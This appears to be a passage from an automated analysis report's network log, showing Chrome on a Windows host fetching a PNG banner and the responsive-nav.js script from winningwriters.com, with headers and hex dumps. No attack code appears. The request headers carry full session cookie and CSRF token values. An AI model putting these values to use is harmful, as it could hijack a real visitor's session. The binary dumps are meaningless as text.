                                                                                                                                                                                            2024-11-18 20:00:04 UTC7820INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 ca 00 00 00 fa 08 03 00 00 00 4e 23 4e 36 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 03 00 50 4c 54 45 f3 f3 f5 ff ff ff f3 c0 15 bc bc cf b4 c3 d4 16 15 55 bc bf d1 26 25 95 18 17 5d 0d 0d 34 b4 c6 d4 b4 c0 d2 0b 0b 2c 11 10 43 14 13 4d 0f 0f 3b b4 c9 d7 0c 13 48 fd fd fd b4 c8 d2 23 22 88 cc cc dd b3 cc d4 ca ca dc 19 19 63 c3 c6 da 08 08 27 b3 cf d6 25 23 8e b4 c0 cb b4 d1 d6 c7 c8 db f6 f8 fa 20 1f 7d 22 20 83 b4 be cf de d0 c0 e3 dc d2 1f 1e 78 e5 df d7 ea ee f2 cf ce df d2 d2 e1 1b 1a 69 eb f1 f6 df d3 c3 1c 1b 6f 1e 1d 74 f1 f1 f3 c7 28 1f e6 eb f2 ee f3 f7 d6 c4 ac f3 f6 f8 b3 c4 ce db ce ba 79 5a 48 b5 d5 d8 d6 c5 ba d6 d5 e3 c0 c1 d3 d8 ca b9 d8 c7 b2 dd e3 ee e0
                                                                                                                                                                                            Data Ascii: PNGIHDRN#N6pHYs+PLTEU&%]4,CM;H#"c'%# }" xiot(yZH
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: fd 15 d4 76 06 be 87 30 ca 91 7d 63 5b a0 2f 6b 31 61 96 23 ef 6d 6d 91 7b 94 56 ef 79 a3 a7 23 17 92 51 c6 6f 19 f2 c7 37 3b c2 9e d5 c9 03 24 3b 3e d4 ed 7a e4 77 94 e5 01 7f a6 3b 2f f0 2f 8d 0d 6c d2 cb 7a 57 25 24 f7 e5 6e 11 bf 73 67 a0 aa 20 5f 77 fc 39 2a cb 77 aa 45 84 ae 28 2b 3f 06 66 b6 bb bb 1c 1f 0a 35 16 16 1a c5 f6 3a 23 67 6d 76 be 71 65 95 a6 18 c9 0b f5 a5 f6 33 4b 95 d9 a9 46 ad bb 4a 90 40 2e 83 24 67 e6 3a 42 17 6b fd 65 8c 72 cf a5 4a ae d8 33 e5 f1 91 fc 3a 2e d9 8a 02 a4 9b 5c ce af 52 af b1 7f fc 7f a9 72 a7 cd ec 26 ff ed 12 1d 52 25 85 e7 42 b2 1a 95 0d f6 54 4c 90 43 de 94 2c 95 4a 5a 21 1b 4d 8d 72 6a c8 68 2f 15 b2 62 49 2a 04 8c 82 aa 09 13 b2 3b 5d 30 1a 03 06 7b 36 16 92 38 ba a9 66 80 d7 0a 42 21 9d 90 63 a5 e9 58 fa 5c
                                                                                                                                                                                            Data Ascii: v0}c[/k1a#mm{Vy#Qo7;$;>zw;//lzW%$nsg _w9*wE(+?f5:#gmvqe3KFJ@.$g:BkerJ3:.\Rr&R%BTLC,JZ!Mrjh/bI*;]0{68fB!cX\
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: ee 48 79 fe 70 d0 b7 2c fb 27 5f e4 ca 13 47 8b 1e fd fe 65 d8 1d bb 14 8e 79 8d ff 99 30 8e 9f 9d 1c 95 f3 64 af 87 0c 75 3b bc eb 29 55 60 ad 2b ce 65 03 a5 04 55 ee 4b 1a 7f 4c 66 a1 f2 39 8b fb c6 3c 61 fb 8f ea 8b 56 2b da 27 e3 1a 6c d7 cc 74 62 c0 8a 50 de c0 28 93 0a 11 d8 2a 23 92 5f 23 90 d7 20 f1 75 eb f9 b3 fb f7 c7 ae ad 3e 8d bf d9 43 c2 bc 97 40 a2 1c 4f a0 7f 44 88 9d 57 1f f3 b8 06 45 c6 46 5e 16 4b 1b 49 7a 31 4d e6 57 7b b3 fb 7d 1b 34 53 c8 ee c8 cc a8 77 ab ca 39 38 c2 3e 14 65 c2 71 ce bb f2 c1 c6 ba fc 1e cd 8c 22 83 29 32 d8 2b 63 d1 25 20 b3 10 5b 88 b3 79 22 9b 23 bc 3f bc e6 15 21 20 db 66 32 e6 0d 0f 99 d1 33 af 5c b3 df 13 f2 a3 fb 1d 87 df ff 8f 98 84 dd 35 03 3b d0 c4 a8 0b d9 3d f2 8e 07 11 fe f2 b1 fb f4 57 77 1f cb f2 44
                                                                                                                                                                                            Data Ascii: Hyp,'_Gey0du;)U`+eUKLf9<aV+'ltbP(*#_# u>C@ODWEF^KIz1MW{}4Sw98>eq")2+c% [y"#?! f23\5;=WwD
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 2f 3c d2 5f 06 f9 42 45 2e db 9a ec d3 9f a5 a9 72 32 4b 45 99 d6 a6 0d bd 84 ec 1b 13 14 ea 88 ce 65 a6 3a 2b e3 4d 68 e2 3c 92 4b 50 2e 5d 28 52 ce 31 3a b6 d9 6c a6 2a 3e 01 05 81 b5 0d 1b 61 c3 42 2f a7 d3 79 d5 ed da fe 2e 20 86 3f 3d 1b 08 9a c2 b2 e8 70 5d ab 89 bb 23 60 2d e3 0c 06 75 2c d3 5a 94 57 8a bf 58 87 65 1c b6 9b 3e 12 62 6f 52 57 e5 90 12 92 e3 46 87 c5 68 74 65 e4 e4 2c 09 c6 1c fe f9 90 24 6e 7c 72 f9 25 31 ba ee f7 56 96 66 c6 a7 19 b0 9e 94 46 03 ca 6d 83 5d 1c e1 36 66 73 cc 04 78 90 1f 14 a3 fc ed 13 58 e9 75 17 62 ec 97 0f ff f2 f0 f1 1f df 31 94 61 9d e6 24 d1 dd f7 2b 00 f3 ee 87 0f 1f 57 66 00 e5 2f 47 5b f9 c9 69 08 be a1 f9 66 7e 9a 44 d8 3b 87 e9 34 c1 f9 e9 1a ec 8c ea 6a a3 4a 7c 7f 14 cc a1 b0 46 4d d7 61 ab 01 75 67 a7
                                                                                                                                                                                            Data Ascii: /<_BE.r2KEe:+Mh<KP.](R1:l*>aB/y. ?=p]#`-u,ZWXe>boRWFhte,$n|r%1VfFm]6fsxXub1a$+Wf/G[if~D;4jJ|FMaug
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 89 39 c8 d5 ac fe 60 4a a8 da 47 6c cc ca b3 3d 7f b0 e8 f7 e9 f1 a8 17 0e 97 87 b9 69 86 ad 09 38 cf 3f b0 7b 34 0c 16 d7 c2 20 99 90 2c 2f 50 63 65 61 c4 cc c8 85 99 29 e2 85 33 e8 79 31 07 bb 49 48 d0 6c 12 67 a3 84 37 12 a8 9b 1a bc fe fb 5a 63 d0 68 72 bb b5 de 4c 3c d7 da bf d4 df 81 64 79 62 6d 14 05 cb 50 04 7b 02 6a 89 4c 6c 6c 40 3d af 91 54 2a 0b a5 36 b3 37 53 d1 68 26 98 58 42 aa 1c 9c 5f ee 36 c6 32 d9 ac 2d 97 8b c7 26 e2 99 a8 3a ef 52 ab 8b e4 18 6b 31 ad 0a 24 2c 5f fe ed 9e 8e 95 2b df c7 ca 3f 76 ac 7c 78 1b 94 4b 04 c4 92 38 b9 bc bc a0 d7 12 80 ae 92 19 54 e9 34 7f 88 8c 5f c3 60 36 64 81 54 ee 0b a5 ad 1c 94 10 01 51 56 79 78 9f e0 5d d3 6a bb c0 35 ef 63 38 6b 4d 38 5d 5d 3d 3c 39 6c 21 d3 4d b4 e3 9b 50 1d a0 8e 4b 27 6f d4 30 3c
                                                                                                                                                                                            Data Ascii: 9`JGl=i8?{4 ,/Pcea)3y1IHlg7ZchrL<dybmP{jLll@=T*67Sh&XB_62-&:Rk1$,_+?v|xK8T4_`6dTQVyx]j5c8kM8]]=<9l!MPK'o0<
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 50 3e 01 2c 03 ca 48 f2 ec 75 7c e8 c2 7f 73 1e 6e 5a 20 d9 ff ed c6 e2 83 f9 ee 5a d9 e7 15 57 0e 11 8c 4b 53 94 39 d5 5e b3 44 2b c5 fc b9 8d 94 79 91 7a 6b 32 b0 5c d6 77 2a da 36 0a 02 07 82 6c 09 06 3a cd 5e e0 39 d8 be 10 a4 15 0a 0a e7 1b d9 05 f6 da 12 0c a3 28 d3 5e 20 db e3 a1 35 b4 27 3c 1d 66 60 0b fb 18 0f ad a2 28 da a7 6b 0d 7b da 05 fa 83 07 0f 1e b0 66 97 5c fe b4 d8 46 0a 37 6d 91 e4 c7 29 ce ee 07 64 01 5a a0 b6 34 91 90 2a 35 71 57 f1 7e 69 0b ca f2 c0 5a 45 c5 68 f4 ee 8b 96 ed b7 16 b3 c6 2f eb ff d7 3a 07 72 4e 07 49 01 92 9d e4 02 d7 da 08 bb 48 2d 6e 65 5a a5 58 49 a0 2e 27 64 97 69 e1 80 bd 25 d3 12 72 bc ba a9 dd 64 cf a3 70 48 8e 8e 59 6f ed 6e 82 c6 ca 2c 8f b3 da 71 db cd 12 ac 26 88 43 7b f7 fc 1b 16 ee 49 fe f4 43 3c ab 79
                                                                                                                                                                                            Data Ascii: P>,Hu|snZ ZWKS9^D+yzk2\w*6l:^9(^ 5'<f`(k{f\F7m)dZ4*5qW~iZEh/:rNIH-neZXI.'di%rdpHYon,q&C{IC<y
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 87 c7 da 95 5b 70 c4 2f 68 09 e5 2b b2 5d aa 32 d6 e2 a7 d7 63 93 d7 d7 67 d6 ef 6c 21 8a c9 9a 39 f6 d3 9d 63 c7 22 2c 63 61 6e 80 b7 3c dd 25 ca 7f c8 dd 31 69 33 37 77 5f 6e 5a ee 9e d8 3e 90 68 25 39 77 5f 44 95 21 29 76 7e c2 33 42 9d a5 be fa d3 79 9f c5 60 61 f5 5f a4 7d 35 06 bb 9b 07 a8 a4 b3 63 43 86 31 0f 65 40 a7 49 30 ec 36 c5 9e 2b d0 7b 3c 0e 8a 4d 85 01 1f a9 7a c6 9f 6c 48 36 92 0c 95 24 c5 17 f6 78 10 92 a9 70 90 30 f6 16 49 28 e4 43 0f 53 80 cd ca 81 83 de b0 c0 98 22 f1 b9 06 5a 02 a1 4e 3b 13 b8 9c c8 b8 3a 43 16 c6 b2 68 b4 c7 40 4c b4 f8 03 41 8e ea 71 dc e8 81 3c 29 49 56 4b f3 62 07 02 e1 3e ec 9a 93 58 31 0b f5 32 92 f7 c2 9c 21 9c 8f 74 2d 5f 2a c5 83 ba a6 e6 9e 17 a9 9d 99 b2 60 97 58 a6 81 19 f2 09 ce 85 85 9e da 6b cd cd 48
                                                                                                                                                                                            Data Ascii: [p/h+]2cgl!9c",can<%1i37w_nZ>h%9w_D!)v~3By`a_}5cC1e@I06+{<MzlH6$xp0I(CS"ZN;:Ch@LAq<)IVKb>X12!t-_*`XkH
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 4c 51 9c 23 91 98 89 c4 a6 2d 5b 80 e5 7d 29 13 f7 cb 46 26 80 7c 27 90 95 47 fc c4 fc f4 69 59 6a b1 34 67 4b e8 39 e0 7f b8 7d 24 a5 29 14 69 49 63 ff 4e 07 ed 9e 98 48 0a 5d 14 ca 28 af 13 71 cb 81 39 cb 6f 3f 40 9d 07 14 79 79 ad d7 f2 af c9 9b 00 c3 25 d6 ca ca fe e4 ee ee 1f 92 ab d5 47 8d 9e c6 bd 9e 7e 6b 25 46 cb ff b9 af 14 a0 4c a9 59 a0 65 01 c8 4a c3 7a 24 93 ba b2 5c 6e 00 2c 47 db 2d 16 4b c9 b4 c7 58 84 46 42 f6 e2 f8 5e a9 54 7c 26 a9 d3 e5 d5 02 2b f7 12 20 bf 93 c6 20 31 a7 58 df 9e 5f 9c ef 5d 79 be b2 6f 65 65 9e 04 c9 a5 b4 be 4c 7b ba c8 05 35 db 9c 05 38 ef fc fd 37 c4 32 04 8a 6f c6 f1 93 10 31 23 37 3b 4b ae cd 03 df fe 88 60 06 b8 96 9c 3e 7a da 9e 48 e4 35 84 ca 2b a3 f5 ce c6 53 56 65 f3 25 84 b1 f2 89 b2 b9 19 fe 07 a8 aa 9f
                                                                                                                                                                                            Data Ascii: LQ#-[})F&|'GiYj4gK9}$)iIcNH](q9o?@yy%G~k%FLYeJz$\n,G-KXFB^T|&+ 1X_]yoeeL{5872o1#7;K`>zH5+SVe%
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 06 73 ce 4f 8b 78 49 16 ef 8d 92 85 f5 6a c2 7a c5 fd 22 6d 99 68 00 a0 65 2e ad c2 84 5d c8 bb 1c a7 d1 ac cf 76 fa 7a 7a 5c 11 99 98 e5 c8 10 60 89 58 46 2e 1c 24 99 33 74 c1 4b 80 48 e6 ec 32 98 42 ff e7 ec fc 63 9a ce cf 38 ce f6 cf 52 8f a4 34 c4 5e 62 63 e3 1f 1a 38 c3 25 a6 48 15 1c 3a 3b 97 42 cf 1e e9 09 78 9d 60 73 77 a3 0e 4b b5 5f db d0 f6 bb 2b a1 68 4b 2c 89 b3 9a 5a 16 f5 94 f6 14 52 f8 2a 01 04 dd 84 94 c4 ad 4b b0 da 9c 09 cd c6 09 61 77 91 98 ee b2 ec 9f 2d 31 26 ec 79 9e cf f7 5b 40 58 a2 f7 29 bf 0a 06 4d cc ab ef f7 f3 e3 f3 3c 72 2e 61 08 06 83 c7 92 6e 6b 42 5b 99 0c 86 dc 85 13 dd 78 27 0a bb 50 14 fc 0c f0 cc ab 95 ec 9f 5a 2c 49 72 71 f1 1c 7c 9a 93 a8 9d 43 25 de 54 ac d5 52 3a 3e bf b3 52 42 b9 7a cf 1e a4 78 37 d6 a4 8c 0c 65
                                                                                                                                                                                            Data Ascii: sOxIjz"mhe.]vzz\`XF.$3tKH2Bc8R4^bc8%H:;Bx`swK_+hK,ZR*Kaw-1&y[@X)M<r.ankB[x'PZ,Irq|C%TR:>RBzx7e
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: eb 1f e0 3d 5f bb 76 60 b6 32 32 bf df 47 95 d3 bb 6b 59 d0 fc 36 bd 3b 32 35 35 35 b2 d6 99 1e d9 bd 33 95 46 a7 bb e8 3a 9d 85 de d3 23 6b bb e9 b5 91 a9 d6 34 86 3e 4d d6 65 a5 47 b2 d0 cd 3b 53 bb 59 df c3 ad 5d b8 48 7f 3f 05 df 4d 77 be 57 04 fb a0 28 0b 08 c3 6f 6d 99 c5 c5 b4 f2 54 27 1f 98 02 ba 07 48 b8 91 3b ec a3 59 83 5b 65 19 52 50 54 84 23 59 35 67 b0 28 a8 dc 0e 33 4b bb 3b 56 7d 2e aa c9 1d a2 d1 3a 5d 40 4b 99 7c b8 b7 6e 2f c4 aa 73 30 d0 39 bd 35 12 74 cb 6d d1 b1 cf 86 74 ab 0a a3 92 8d e8 dc a1 25 9d 12 94 5a c9 d2 c1 21 e4 5f d7 e4 20 49 a7 e9 13 3a b1 a5 d7 a5 38 6d a3 de 8a 29 b5 77 96 4b fd 17 90 e1 0a 50 26 24 5f 87 94 af 8a 7a 6b 66 37 0a b7 04 82 11 15 e7 b9 69 e9 a4 53 1f 27 cb c4 59 c6 22 7b c5 39 7a 05 67 6e 15 17 67 0a 1e
                                                                                                                                                                                            Data Ascii: =_v`22GkY6;25553F:#k4>MeG;SY]H?MwW(omT'H;Y[eRPT#Y5g(3K;V}.:]@K|n/s095tmt%Z!_ I:8m)wKP&$_zkf7iS'Y"{9zgng


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            7192.168.2.164971466.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:05 UTC646OUTGET /assets/js/responsive-nav-scripts.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:05 UTC367INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:05 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "3572-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 13682
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:05 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:05 UTC7825INData Raw: 2f 2a 21 20 72 65 73 70 6f 6e 73 69 76 65 2d 6e 61 76 2e 6a 73 20 31 2e 30 2e 32 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 76 69 6c 6a 61 6d 69 73 2f 72 65 73 70 6f 6e 73 69 76 65 2d 6e 61 76 2e 6a 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 72 65 73 70 6f 6e 73 69 76 65 2d 6e 61 76 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 20 40 76 69 6c 6a 61 6d 69 73 0a 20 2a 20 41 76 61 69 6c 61 62 6c 65 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 0a 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 2f 2a 20 65 78 70 6f 72 74 65 64 20 72 65 73 70 6f 6e 73 69 76 65 4e 61 76 20 2a 2f 0a 20 20 76 61 72 20 72 65 73
                                                                                                                                                                                            Data Ascii: /*! responsive-nav.js 1.0.23 * https://github.com/viljamis/responsive-nav.js * http://responsive-nav.com * * Copyright (c) 2013 @viljamis * Available under the MIT license */(function () { "use strict"; /* exported responsiveNav */ var res
                                                                                                                                                                                            2024-11-18 20:00:05 UTC5857INData Raw: 6f 6e 65 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 73 65 74 41 74 74 72 69 62 75 74 65 73 28 6e 61 76 54 6f 67 67 6c 65 2c 20 7b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 20 22 66 61 6c 73 65 22 7d 29 3b 0a 20 20 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 49 66 20 74 68 65 20 6e 61 76 69 67 61 74 69 6f 6e 20 69 73 20 68 69 64 64 65 6e 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6e 61 76 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28 2f 28 5e 7c 5c 73 29 63 6c 6f 73 65 64 28 5c 73 7c 24 29 2f 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 41 74 74 72 69 62 75 74 65 73 28 6e 61 76 2c 20 7b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 20 22 74 72 75 65 22 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 76 2e 73 74 79 6c 65 2e 70 6f 73
                                                                                                                                                                                            Data Ascii: one") { setAttributes(navToggle, {"aria-hidden": "false"}); // If the navigation is hidden if (nav.className.match(/(^|\s)closed(\s|$)/)) { setAttributes(nav, {"aria-hidden": "true"}); nav.style.pos


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            8192.168.2.164971766.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:05 UTC908OUTGET /graphics/newsletter/best_free_contests_top_banner_2024.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:05 UTC371INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:05 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 27 Oct 2024 21:20:02 GMT
                                                                                                                                                                                            ETag: "185df-6257bea55596f"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 99807
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:05 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:05 UTC7821INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 ca 00 00 00 fa 08 06 00 00 00 79 fd be 04 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 04 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 27 ef bb bf 27 20 69 64 3d 27 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 27 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 27 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 27 3e 0a 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 27 3e 0a 0a 20 3c 72 64 66 3a 44 65 73 63 72 69 70
                                                                                                                                                                                            Data Ascii: PNGIHDRypHYs+fiTXtXML:com.adobe.xmp<?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?><x:xmpmeta xmlns:x='adobe:ns:meta/'><rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'> <rdf:Descrip
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 87 ba 66 0d f8 3d d1 15 41 2f 0c 47 e8 db d3 10 be 74 31 22 57 af 46 f5 6f 56 a1 fa c2 f9 08 7f eb 4d 84 8e 1e 09 ff a7 7a 42 53 bb 16 a8 60 01 13 c9 0f 06 ae 49 e9 a8 d1 04 3e 3d 03 e0 85 0a f7 96 28 53 a1 ec 38 9b ee 48 6e 6e 2e da b6 6d 8b a9 53 a7 56 fa ba 7e 49 49 49 6e 97 b5 7a f5 d5 57 91 9a 9a ea d4 76 f8 f0 61 bc f3 ce 3b c5 3e 6e bb 76 ed 64 af df ac 59 b3 f0 e5 97 5f 16 6b 5f 75 ea d4 91 b5 64 38 72 fd fa 75 4c 99 32 05 26 93 49 b2 ac 34 dd 37 13 13 13 dd 2a f7 a5 d3 e9 30 76 ec 58 d9 99 c9 1b 37 6e a0 6f df be d0 e9 74 b2 db 2a b9 7d 2e 58 b0 00 df 7e fb 6d b1 fa 5b 5c 6a d5 aa 05 3f 3f 3f a7 b6 c4 c4 44 0c 1a 34 48 36 5e bf 30 b2 b2 b2 d0 b7 6f df 42 05 41 51 cc 9a 35 ab 44 25 41 f6 ed db 87 91 23 47 ca cf 0c 97 13 d9 d9 d9 58 ba 74 a9 ec a0
                                                                                                                                                                                            Data Ascii: f=A/Gt1"WFoVMzBS`I>=(S8Hnn.mSV~IIInzWva;>nvdY_k_ud8ruL2&I47*0vX7not*}.X~m[\j???D4H6^0oBAQ5D%A#GXt
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: de 7d 5f 8b d2 20 39 39 19 6d db b6 c5 ec d9 b3 11 13 13 83 e4 e4 64 cc 9b 37 4f d6 ed 57 ad 56 63 e4 c8 91 4e 6d fd fb f7 47 54 54 14 fe fe fb 6f a7 f6 1b 37 6e a0 45 8b 16 78 e3 8d 37 d0 a1 43 07 f8 fa fa e2 ce 9d 3b f8 f5 d7 5f b1 7a f5 6a 64 64 64 c0 c7 c7 07 31 31 31 8a 2e 66 85 e1 e9 e9 89 87 1f 7e 58 d2 cf bc bc 3c 74 ea d4 09 bd 7a f5 c2 9d 3b 77 b0 77 ef 5e 1c 3f 7e dc 3e b1 33 66 cc 18 cc 9f 3f 5f 52 f6 2a 31 31 11 5d bb 76 c5 94 29 53 50 a3 46 0d 5c b8 70 01 73 e6 cc 91 1d 88 f7 ea d5 0b 8f 3d f6 58 b1 fa 4b 08 c1 94 29 53 30 6a d4 28 c9 b2 b7 df 7e 1b 77 ee dc 41 6c 6c 2c 08 21 d8 be 7d 3b 96 2e 5d 2a bb 9f e9 d3 a7 4b da aa 57 af 2e a9 c7 2b 08 02 46 8e 1c 89 89 13 27 22 33 33 13 9f 7c f2 89 62 ad dd ff 02 93 26 4d c2 8a 15 2b 24 c9 d3 76 ec
                                                                                                                                                                                            Data Ascii: }_ 99md7OWVcNmGTTo7nEx7C;_zjddd111.f~X<tz;ww^?~>3f?_R*11]v)SPF\ps=XK)S0j(~wAll,!};.]*KW.+F'"33|b&M+$v
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 18 6d 1a 40 ce 0a 9e 01 06 16 2a d4 39 d7 8c 0b 5b 18 6b a3 88 72 c6 9d 7d 23 10 a1 2c 08 82 20 08 82 20 6c 5d 94 c2 1d 2b e3 16 8b 69 04 38 15 6e eb d5 6e 26 16 dd a9 73 75 92 56 1c 04 28 d7 c5 9d 9a 20 b7 6b 17 fe 2f be 12 6f c7 76 9c 4a 05 e5 fb e8 99 59 96 bf 7a 37 e1 fc 02 ca 71 b6 84 58 b4 99 7b 6a 93 c5 80 78 f5 20 7b 6d e9 df 20 fe 33 a4 82 9a b3 b4 a5 12 2e 0e 86 3e 9f 66 66 16 d3 ed e2 94 cb 1b 36 05 11 ca c2 45 49 fb f1 c7 59 fa 8f af d0 9b 9d c5 df b5 8b c9 f7 de 41 e1 aa ab 36 7b 5a e7 84 0d 43 96 be 72 37 cd 87 1e c2 06 3d 8a af b9 96 c9 3b ef c4 1d 1f db ec a9 5d 14 74 8f 1e a5 f6 a5 2f 13 9c 3c 85 b7 6d 9a ea bb 7e 83 f2 eb af df ec 69 09 02 8b 5f fa 32 f5 7d fb 28 5e 7b 0d c5 ab af a6 70 cd d5 f8 db b7 6f f6 b4 04 61 63 88 bf 6c 3b e5 32
                                                                                                                                                                                            Data Ascii: m@*9[kr}#, l]+i8nn&suV( k/ovJYz7qX{jx {m 3.>ff6EIYA6{ZCr7=;]t/<m~i_2}(^{poacl;2
